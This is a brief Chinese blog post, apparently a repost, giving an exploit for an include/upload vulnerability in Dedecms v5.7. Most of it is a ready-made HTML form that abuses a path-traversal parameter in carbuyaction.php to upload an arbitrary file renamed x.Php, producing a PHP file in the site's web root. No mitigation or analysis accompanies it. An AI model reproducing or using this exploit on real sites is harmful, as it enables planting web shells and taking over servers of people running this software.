Dedecms v5.7包含上传漏洞利用

Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16

注册,登录,免邮箱验证.

up.htm

---------------------------------------------------------------------------------------------------------

<form action="http://www.xx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="x.Php"/>
<button class="button2" type="submit">提交</button><br><br>

  

---------------------------------------------------------------------------------------------------------

根目录生成x.php

posted on 2015-03-07 13:13  Tea_Ing  阅读(220)  评论(0编辑  收藏  举报

导航